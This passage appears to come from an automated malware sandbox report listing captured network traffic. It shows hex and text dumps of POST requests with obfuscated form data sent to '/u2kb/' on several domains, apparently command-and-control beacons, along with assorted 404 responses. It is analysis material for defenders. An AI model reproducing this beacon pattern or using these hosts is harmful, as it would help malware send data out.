s7=klWTZiHc1Nq6cgjq1Jd8ZRN5baHlyFD50izH4iQpgnd9tOEpRNdxQ6eFptfG0EfLdBgPKUQWhVmGVHJAWheP7uOudG(qUjCOc9utbmQzdc440b272uejVfCkmaQE2fuU(XSywyvxDwR1c-gSipWPXyMO~Xg4QKHzCBKGVHN5hZ31ZK9KUA).
Source: global traffic HTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.shapshit.xyzConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.shapshit.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.shapshit.xyz/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 73 37 3d 56 66 52 78 77 52 51 41 62 39 68 53 34 69 67 43 61 62 55 4f 74 73 43 58 33 33 37 34 75 70 74 46 36 39 4a 35 4d 6c 6f 58 38 52 7e 61 54 43 34 79 43 55 59 6d 74 76 4f 59 54 30 43 77 77 6b 57 62 67 30 4e 56 77 59 62 34 7e 47 46 35 64 4f 36 41 56 59 74 5a 39 32 6b 78 63 42 54 62 54 50 69 76 48 63 4d 59 6b 54 72 72 78 4c 56 52 43 47 31 78 6a 77 73 31 76 30 6c 34 6d 5a 38 61 36 64 48 79 45 43 58 4a 4f 58 4a 77 4c 4a 53 48 63 44 34 34 75 70 72 76 4b 6d 79 73 73 36 28 50 45 48 45 72 57 6d 76 46 37 75 58 4e 7e 54 6f 58 4e 2d 50 33 52 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: s7=VfRxwRQAb9hS4igCabUOtsCX3374uptF69J5MloX8R~aTC4yCUYmtvOYT0CwwkWbg0NVwYb4~GF5dO6AVYtZ92kxcBTbTPivHcMYkTrrxLVRCG1xjws1v0l4mZ8a6dHyECXJOXJwLJSHcD44uprvKmyss6(PEHErWmvF7uXN~ToXN-P3RA).
Source: global traffic HTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.thedivinerudraksha.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.thedivinerudraksha.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thedivinerudraksha.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 73 37 3d 76 6b 52 79 55 54 39 48 56 37 31 4b 53 39 69 70 58 76 6c 62 5a 2d 54 52 6a 2d 42 6f 6b 59 51 73 52 45 6b 54 6f 4b 39 64 75 5a 43 34 65 75 6b 6a 35 6a 76 55 30 52 32 72 47 74 7e 63 4f 39 70 54 28 75 4a 6c 4f 4d 47 50 6d 6e 75 76 6d 70 62 69 65 73 38 32 31 49 63 74 65 59 51 61 48 5a 57 45 65 4b 70 71 69 6d 38 45 48 68 4b 41 62 7a 64 2d 31 61 32 6d 50 56 73 46 53 57 56 71 31 73 30 72 35 4e 63 38 39 75 50 59 77 6d 71 4b 38 34 73 48 4b 63 46 38 53 75 31 48 6a 77 4f 66 4a 4d 31 36 33 67 32 6d 46 56 73 77 33 51 47 62 7e 31 69 66 7e 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: s7=vkRyUT9HV71KS9ipXvlbZ-TRj-BokYQsREkToK9duZC4eukj5jvU0R2rGt~cO9pT(uJlOMGPmnuvmpbies821IcteYQaHZWEeKpqim8EHhKAbzd-1a2mPVsFSWVq1s0r5Nc89uPYwmqK84sHKcF8Su1HjwOfJM163g2mFVsw3QGb~1if~g).
Source: global traffic HTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.un-object.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.un-object.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.un-object.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 73 37 3d 6b 54 72 45 4b 70 64 4c 49 67 35 6e 53 45 58 46 49 30 51 31 34 50 31 6a 65 47 51 39 7e 4c 69 66 52 76 67 68 61 35 32 79 77 6d 7e 62 4b 43 4f 38 32 69 72 55 51 78 72 36 28 5f 41 6e 31 32 58 39 54 56 38 71 61 54 45 52 49 35 71 74 31 7a 70 73 46 43 64 51 6a 6c 50 57 4d 47 4c 38 68 67 53 5f 36 30 6e 43 66 37 44 31 67 38 61 70 38 64 73 70 28 4e 73 43 32 4a 4b 65 65 53 56 73 76 6c 51 5a 79 6c 66 2d 64 5a 6f 34 57 4a 4d 72 76 69 63 30 64 70 42 7a 77 38 47 73 57 43 76 63 46 74 41 4e 42 34 62 52 6a 70 56 58 38 49 43 6b 66 6b 4a 6d 50 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: s7=kTrEKpdLIg5nSEXFI0Q14P1jeGQ9~LifRvgha52ywm~bKCO82irUQxr6(_An12X9TV8qaTERI5qt1zpsFCdQjlPWMGL8hgS_60nCf7D1g8ap8dsp(NsC2JKeeSVsvlQZylf-dZo4WJMrvic0dpBzw8GsWCvcFtANB4bRjpVX8ICkfkJmPA).
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 20 Mar 2023 15:59:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 37 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 72(HML),I310Q/Qp/K&T$dCAfAyyyzzJaC0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 20 Mar 2023 15:59:54 GMTContent-Type: text/htmlContent-Length: 153Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 15:59:59 GMTContent-Type: text/htmlContent-Length: 199Connection: closeAccept-Ranges: bytesVary: Accept-Encoding,User-AgentContent-Encoding: gzipData Raw: 1f 8b 08 00 00 00 00 00 00 03 e5 8e c1 0e 82 30 10 44 ef fd 8a d5 bb 5d 34 1e 9b 26 4a 4b 6c 82 60 4c 39 70 14 a8 81 a8 10 69 91 df b7 d5 8b ff e0 de 66 f6 ed cc b2 85 c8 63 5d 9e 24 1c f4 31 85 53 b1 4f 55 0c cb 15 a2 92 3a 41 14 5a 7c 37 1b 1a 21 ca 6c c9 09 0b 9a b3 83 dc 09 2f b4 d2 a9 e4 db 68 0b d9 e0 20 19 a6 be 61 f8 35 09 c3 0f c4 f6 b9 28 c3 dd 9a ff 30 5e 11 dd 1a 18 cd 73 32 d6 99 06 8a 73 0a 38 6d 6e 15 c2 7c b1 d0 7b f6 1a 58 18 7a 70 6d 67 c1 9a f1 65 46 ea 93 ce 3e 4e f1 79 9e 69 d5 b9 60 77 b5 b1 77 d7 d0 7a 78 30 54 a1 fa 53 ea 6b c2 b3 e4 9f e7 0d 15 d1 11 fb e3 01 00 00 Data Ascii: 0D]4&JKl`L9pifc]$1SOU:AZ|7!l/h a5(0^s2s8mn|{XzpmgeF>Nyi`wwzx0TSk
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 16:00:01 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingAccept-Ranges: bytesVary: Accept-Encoding,User-AgentData Raw: 32 35 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 32 6b 62 2f 3f 70 4a 3d 79 30 62 4d 56 47 68 4b 33 52 26 61 6d 70 3b 73 37 3d 72 72 2b 73 4f 42 76 45 58 73 42 64 47 65 76 55 6b 5a 45 41 76 6e 69 47 57 72 4e 78 7a 43 31 59 4e 48 6d 58 69 76 72 39 32 46 51 68 52 49 49 59 73 65 64 52 68 4c 2b 59 47 61 4e 32 56 43 69 65 47 74 6a 74 4c 54 55 54 7a 55 71 78 44 58 33 57 66 37 57 6c 32 4a 49 42 48 75 30 57 57 39 76 44 6d 51 3d 3d 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 48 52 3e 0a 3c 49 3e 77 77 77 2e 62 69 74 73 65 72 76 69 63 65 73 6c 74 64 2e 63 6f 6d 3c 2f 49 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0d 0a Data Ascii: 25d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /u2kb/?pJ=y0bMVGhK3R&amp;s7=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7Wl2JIBHu0WW9vDmQ== was not found on this server.<HR><I>www.bitservicesltd.com</I></BODY></HTML>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbiddendate: Mon, 20 Mar 2023 16:00:06 GMTcontent-type: text/htmltransfer-encoding: chunkedvary: Accept-Encodingserver: NginXcontent-encoding: gzipconnection: closeData Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 16:00:15 GMTServer: Apache/2.4.54 (Debian)X-Powered-By: PHP/7.4.33Strict-Transport-Security: max-age=63072000; preloadConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 64 63 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 6c 64 6f 6d 61 69 6e 73 2e 68 6f 73 74 69 6e 67 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 70 61 72 6b 69 6e 67 2f 73 74 79 6c 65 73 2e 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 65 6e 65 72 67 79 73 65 72 76 69 63 65 73 74 61 74 69 6f 6e 2e 63 6f 6d 20 72 65 67 69 73 74 65 72 65 64 20 61 74 20 61 6c 6c 64 6f 6d 61 69 6e 73 2e 68 6f 73 74 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 5f 69 6e 6e 65 72 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 70 61 72 6b 69 6e 67 2f 69 6d 67 2f 61 6c 6c 64 6f 6d 61 69 6e 73 5f 6c 6f 67 6f 2e 70 6e 67 22 20 61 6c 74 3d 22 61 6c 6c 64 6f 6d 61 69 6e 73 2e 68 6f 73 74 69 6e 67 20 4c 6f 67 6f 22 20 2f 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 3c 68 31 3e 54 68 65 20 64 6f 6d 61 69 6e 20 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 65 6e 65 72 67 79 73 65 72 76 69 63 65 73 74 61 74 69 6f 6e 2e 63 6f 6d 3c 2f 73 70 61 6e 3e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 61 20 63 75 73 74 6f 6d 65 72 2e 3c 2f 68 31 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 42 65 63 6f 6d 65 20 61 20 61 6c 6c 64 6f 6d 61 69 6e 73 2e 68 6f 73 74 69 6e 67 20 63 75 73 74 6f 6d 65 72 20 61 6e 64 20 62 65 6e 65 66 69 74 20 66 72 6f 6d 20 74 68 65 20 6e 75 6d 65 72 6f 75 73 20 61 64 76 61 6e 74 61 67 65 73 21 3c 62 72 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 16:00:18 GMTServer: Apache/2.4.54 (Debian)X-Powered-By: PHP/7.4.33Strict-Transport-Security: max-age=63072000; preloadConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 65 30 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 6c 64 6f 6d 61 69 6e 73 2e 68 6f 73 74 69 6e 67 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 70 61 72 6b 69 6e 67 2f 73 74 79 6c 65 73 2e 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 65 6e 65 72 67 79 73 65 72 76 69 63 65 73 74 61 74 69 6f 6e 2e 63 6f 6d 20 72 65 67 69 73 74 65 72 65 64 20 61 74 20 61 6c 6c 64 6f 6d 61 69 6e 73 2e 68 6f 73 74 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 5f 69 6e 6e 65 72 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 70 61 72 6b 69 6e 67 2f 69 6d 67 2f 61 6c 6c 64 6f 6d 61 69 6e 73 5f 6c 6f 67 6f 2e 70 6e 67 22 20 61 6c 74 3d 22 61 6c 6c 64 6f 6d 61 69 6e 73 2e 68 6f 73 74 69 6e 67 20 4c 6f 67 6f 22 20 2f 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 3c 68 31 3e 54 68 65 20 64 6f 6d 61 69 6e 20 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 65 6e 65 72 67 79 73 65 72 76 69 63 65 73 74 61 74 69 6f 6e 2e 63 6f 6d 3c 2f 73 70 61 6e 3e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 61 20 63 75 73 74 6f 6d 65 72 2e 3c 2f 68 31 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 42 65 63 6f 6d 65 20 61 20 61 6c 6c 64 6f 6d 61 69 6e 73 2e 68 6f 73 74 69 6e 67 20 63 75 73 74 6f 6d 65 72 20 61 6e 64 20 62 65 6e 65 66 69 74 20 66 72 6f 6d 20 74 68 65 20 6e 75 6d 65 72 6f 75 73 20 61 64 76 61 6e 74 61 67 65 73 21 3c 62 72 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundserver: openresty/1.13.6.1date: Mon, 20 Mar 2023 16:00:34 GMTcontent-type: text/htmlcontent-length: 175connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty/1.13.6.1</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 16:00:39 GMTServer: ApacheContent-Length: 4406Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 16:00:42 GMTServer: ApacheContent-Length: 4406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 